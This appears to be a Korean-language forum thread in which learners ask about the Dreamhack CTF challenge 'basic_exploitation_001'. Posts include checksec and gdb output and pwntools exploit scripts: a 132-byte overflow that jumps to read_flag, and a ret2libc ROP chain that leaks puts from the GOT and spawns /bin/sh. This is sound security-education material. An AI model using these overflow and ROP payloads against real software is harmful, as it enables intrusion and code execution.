basic_exploitation_001

그래서 curl을 사용해서 우분투에 직접 다운받아보았는데 무슨 이유에서인지 압축이 풀리지 않아 직접 c파일을 보안 정보에 맞게 컴파일을 하려고 하였지만 또 다양한 라이브러리들의 링킹 에러등을 마주해서 쉽지가 않습니다.. 혹시 더 쉬운 방법이 있을까요?

pwndbg> checksec [*] '/home/kali/basic2' Arch: i386-32-little RELRO: No RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0x8048000) 보안 해제도 똑같이 해주고 pwndbg> print read_flag $1 = {<text variable, no debug info>} 0x80485fb <read_flag> read_flag주소도 찾아서 넣었는데 from pwn import * r = remote('host1.dreamhack.games', 18560) read_addr = 0x80485fb buf = b'A'*128 fsp = b'A'*4 payload = buf payload += fsp payload += p32(read_addr) r.send(payload) r.interactive() 안되는데 이유가뭔가요 그리고 char buf[0x80]이라고 나와있는데 gdb로보면 call부르기전에 보면 ebp-0x80 이 아니라 ebp-0x88만큼 해주는데 뭔가요 0x08048643 <+29>: call 0x8048594 <initialize> 0x08048648 <+34>: sub esp,0xc 0x0804864b <+37>: lea eax,[ebp-0x88] 0x08048651 <+43>: push eax 0x08048652 <+44>: call 0x80483c0 <gets@plt> (수정) ebp-0x88은 문제파일 안쓰고 환경 직접 만드느라 실수했나봐요 문제파일쓰니깐 ebp-0x80나오네요 죄송;

그냥 print read_flag 할때는 주소가 0x8e2로 뜨는데 pwndbg> print read_flag $1 = {<text variable, no debug info>} 0x8e2 <read_flag> run 하고 다시 구해보면 pwndbg> print read_flag $2 = {<text variable, no debug info>} 0x5555555548e2 <read_flag> 이렇게뜨는데 차이가 뭔가요 그리고 둘다 주소로 해서 해봐도 /cat flag가 실행이 안되는데 다른 주소가 있는건가요

어찌 어찌 문제는 풀었습니다. 그런데 처음에 gdb info function을 통해 read_flag의 주소를 입력해도 접속이 안되어 찾아보니 주소가 다르게 나오는 겁니다. 여기에 주소를 쓸 수는 없고 정답주소보다 80만큼 큰 주소가 read_flag의 주소로 표시됩니다. (모든 함수의 주소가 다른 사람들과 다르게 나옵니다.) 어떤 부분에서 오류가 발생하여 전체적인 주소가 다르게 나온건지 모르겠습니다...ㅜㅜ

read_flag 함수를 이용하여 풀긴 했는데 궁금증이 있어서 질문드립니다. 드림핵 RTL 강의에 있는 방법대로 system 함수의 주소와 "/bin/sh"문자열 주소를 획득하여버퍼로 넣어주고, system 함수로 뛰는 것과 함수 내부에서 eax 레지스터에 /bin/sh 문자열 포인터까지 제대로 들어가는 것을 확인했는데, 강의에서의 example1.c 파일과 다르게 sh이 실행이 되질 않네요. 이유가 궁금합니다.

payload를 제출한 후에 read_flag 함수가 실행되면서 flag가 출력이 되기 때문에 p = remote('','') p = remote('') .. 생략 .. flag = p.recvline() print(flag) 이렇게 했는데 Traceback (most recent call last): File "ex.py", line 12, in <module> flag = p.recvline() File "/usr/local/lib/python3.8/dist-packages/pwnlib/tubes/tube.py", line 496, in recvline return self.recvuntil(self.newline, drop = not keepends, timeout = timeout) File "/usr/local/lib/python3.8/dist-packages/pwnlib/tubes/tube.py", line 339, in recvuntil res = self.recv(timeout=self.timeout) File "/usr/local/lib/python3.8/dist-packages/pwnlib/tubes/tube.py", line 104, in recv return self._recv(numb, timeout) or b'' File "/usr/local/lib/python3.8/dist-packages/pwnlib/tubes/tube.py", line 174, in _recv if not self.buffer and not self._fillbuffer(timeout): File "/usr/local/lib/python3.8/dist-packages/pwnlib/tubes/tube.py", line 153, in _fillbuffer data = self.recv_raw(self.buffer.get_fill_size()) File "/usr/local/lib/python3.8/dist-packages/pwnlib/tubes/sock.py", line 56, in recv_raw raise EOFError EOFError 이렇게 오류가 발생했습니다. 어차피 입력을 받아오는것인데 왜 오류가 발생하는건가요?? 찾아보니 프로세스에서 데이터를 보내지 않는다고 하긴 합니다만.. 혹시 stdout과 관련이 있는건 아닌가 조심스럽게 추측해 보겠습니다.

image.png 오류 image.png p32는 int형만 먹는다는데 어떻게 바꿔주어야 오류가 안나오나요?

basic_exploitation_001 문제를 ROP를 사용해서 풀어보고 있는데 의문점이 생겨서 올립니다. from pwn import * context.log_level = 'debug' #p = remote('host3.dreamhack.games', 15998) p= process('./basic_exploitation_001') e = ELF('./basic_exploitation_001') libc = ELF('/lib/i386-linux-gnu/libc.so.6') #libc = e.libc #binsh = 0xf7f3d0f5 puts_plt = e.plt['puts'] puts_got = e.got['puts'] main = e.symbols['main'] #dummy = b'AAAA' dummy = p32(0x0804864b) # pop ebp ; ret payload = b'A' * 0x84 + p32(puts_plt) payload += dummy payload += p32(puts_got) payload += p32(main) p.sendline(payload) puts = u32(p.recvn(4)) #print('payload1 : ', payload) print('puts : ', hex(puts)) libc_base = puts - libc.symbols['puts'] binsh = libc_base + 0x1bd0f5 #print('binsh : ' + str(p32(binsh))) system_plt = e.plt['system'] system = libc_base + libc.symbols['system'] payload = b'A' * 0x84 + p32(system_plt) payload += dummy payload += p32(binsh) p.sendline(payload) p.interactive() payload를 작성할 때, ret 주소를 덮어 씌운 다음에 4bytes가 저는 argv[0] 가 들어가있는 자리인줄 알고, dummy로 덮은 다음에 함수 인자 값을 넣어줬습니다. 그런데, 계속 안풀려서, rop gadget 아무거나 찾아서 dummy 자리에 넣어보니까 바로 풀렸습니다. 저 ret 다음 4bytes 공간에 ret 가젯을 안 넣어도 첫 페이로드로 puts got값이 leak이 되는거 보면 dummy를 넣어도 우회가 된다는 소리 같은데, system 함수 호출할 때, ret 가젯을 안넣으면 정상적으로 실행이 안되는 이유를 모르겠습니다. gdb를 통해서 하드코딩한 binsh 값이랑 libc_base leak을 해서 구한 binsh값이랑 동일하게 나옵니다.

message=b'A'*0x84+p32(0x80485b9) p.sendline(message) 이렇게 해서 일단 답은 나오긴했는데... 너무 궁금한게 그럼 message가 대충 b'AAAA....Ax/b9\x85\x04\x08' 이렇게 되는데,,, 왜 return address 부분만 리틀 엔디안으로 바꾸나요..? 바꿀거면 아예 통으로 바꿔서 x/b9\x85\x04\x08b'AAAA....A 이런식으로 저장되어야 리틀 엔디안으로 저장해서 리턴주소가 스택의 가장 아래(주소 높은 부분)로 가지 않나요..? ㅠㅠㅠ

안녕하세요 우분투 22.03 64bit버전으로 실습하고 있습니다. 64bit버전으로 돌리기 위해서 i386도 설치해줬습니다. 문제 pwntools로 A 132개하고 셸부분 함수 주소 입력해서 풀었는데 아래와 같이 cat: flag: 그런 파일이나 디렉토리가 없다고 오류가 뜹니다.. 제가 잘못푼건가요? 아니면 오류 어떻게 고쳐야할까요? [+] Starting local process './basic_exploitation_001': pid 3588 [*] Switching to interactive mode [+] Starting local process './basic_exploitation_001': pid 3588 [*] Switching to interactive mode [+] Starting local process './basic_exploitation_001': pid 3588 [*] Switching to interactive mode cat: flag: 그런 파일이나 디렉터리가 없습니다 [*] Got EOF while reading in interactive $